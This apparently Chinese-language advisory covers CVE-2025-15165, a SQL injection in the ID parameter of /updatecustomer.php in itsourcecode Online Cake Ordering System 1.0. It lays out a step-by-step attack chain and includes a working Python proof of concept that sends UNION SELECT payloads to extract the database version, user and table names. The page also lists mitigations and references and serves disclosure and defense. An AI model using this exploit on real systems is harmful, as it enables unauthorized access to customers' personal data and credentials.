CVE-2025-15165 itsourcecode Online Cake Ordering System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15165

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Cake Ordering System 1.0

漏洞概述

CVE-2025-15165是itsourcecode公司开发的在线蛋糕订购系统1.0版本中的一个高危安全漏洞。该漏洞存在于/updatecustomer.php文件的edit操作中，由于对用户输入的ID参数缺乏充分的输入验证和过滤，攻击者可以通过构造恶意的SQL语句实现SQL注入攻击。成功利用此漏洞，攻击者可以在未经认证的情况下远程获取数据库中的敏感信息，包括用户账户、密码、个人信息等数据。CVSS评分7.3分，属于高危漏洞，对系统的机密性、完整性和可用性均造成一定影响。由于该漏洞的利用代码已公开披露，且无需认证即可发起攻击，因此存在被恶意利用的实际风险。

技术细节

该SQL注入漏洞位于/updatecustomer.php文件中的ID参数处理逻辑。攻击者可以通过URL参数ID注入恶意SQL语句。由于应用程序直接将该参数值拼接到SQL查询语句中，而未使用参数化查询或输入过滤机制，攻击者可以构造如'union select'等SQL语句来提取数据库信息。攻击者通常利用UNION注入技术，通过在原始查询后追加UNION SELECT语句来获取数据库中的敏感表和字段信息。常见的利用方式包括：1) 使用ORDER BY确定字段数；2) 使用UNION SELECT获取数据库版本、当前数据库名等信息；3) 从系统表（如information_schema）中提取所有数据库和表结构；4) 最终提取目标表中的用户凭证或其他敏感数据。由于漏洞存在于客户信息编辑功能处，攻击者可能获取到客户的个人信息、地址、联系方式等隐私数据。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的是itsourcecode Online Cake Ordering System 1.0，并定位到/updatecustomer.php文件

STEP 2

步骤2

攻击者访问/updatecustomer.php?action=edit页面，测试ID参数是否存在SQL注入漏洞

STEP 3

步骤3

攻击者构造恶意SQL注入payload（如UNION SELECT语句），通过ID参数注入到SQL查询中

STEP 4

步骤4

数据库执行注入的SQL语句，攻击者获取数据库版本、当前用户、数据库名等信息

STEP 5

步骤5

攻击者进一步利用UNION注入，从information_schema系统表中提取所有表名和字段结构

STEP 6

步骤6

攻击者提取敏感表（如用户表）中的账户、密码、个人信息等数据

STEP 7

步骤7

攻击者利用获取的凭证进行后续攻击，如账户接管或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-15165 PoC - itsourcecode Online Cake Ordering System SQL Injection
Target: /updatecustomer.php?action=edit
Parameter: ID
"""

import requests
import sys

def exploit_sql_injection(target_url, param_id):
    """
    SQL Injection exploit for CVE-2025-15165
    Extracts database version and current user
    """
    # SQL Injection payload to extract database version
    payload = f"{param_id}' UNION SELECT NULL,version(),user(),database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
    
    target = f"{target_url}/updatecustomer.php?action=edit&id={payload}"
    
    print(f"[*] Target: {target}")
    print(f"[*] Sending malicious request...")
    
    try:
        response = requests.get(target, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[*] Check response for database information")
            print(f"[*] Response length: {len(response.text)} bytes")
            
            # Check for SQL error messages
            if 'SQL' in response.text or 'error' in response.text.lower():
                print(f"[!] Potential SQL error detected in response")
                
            return response.text
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None

def extract_tables(target_url, param_id):
    """
    Extract table names from database using UNION injection
    """
    # Payload to extract all table names from information_schema
    payload = f"{param_id}' UNION SELECT NULL,table_name,table_schema,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    
    target = f"{target_url}/updatecustomer.php?action=edit&id={payload}"
    print(f"[*] Extracting table names...")
    
    try:
        response = requests.get(target, timeout=30)
        return response.text
    except:
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-15165.py <target_url>")
        print("Example: python3 cve-2025-15165.py http://target.com/cakeshop")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    param_id = "1"
    
    print("=" * 60)
    print("CVE-2025-15165 SQL Injection PoC")
    print("Target: itsourcecode Online Cake Ordering System 1.0")
    print("=" * 60)
    
    exploit_sql_injection(target_url, param_id)

影响范围

itsourcecode Online Cake Ordering System 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1) 在Web应用层实现输入过滤机制，对ID参数进行严格的类型检查和特殊字符过滤；2) 在数据库层限制应用程序账户的权限，避免使用高权限数据库账户；3) 临时关闭/updatecustomer.php的edit功能或限制访问IP；4) 启用数据库查询日志和异常检测机制，及时发现和阻止SQL注入攻击行为；5) 考虑部署ModSecurity等WAF规则来识别和阻断常见的SQL注入攻击模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15165
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15165
3 Details https://www.cvedetails.com/cve/CVE-2025-15165/
4 VulDB https://vuldb.com/cve/CVE-2025-15165
5 Link https://github.com/LaneyYu/cve/issues/4
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.338544
8 Link https://vuldb.com/?id.338544
9 Link https://vuldb.com/?submit.721106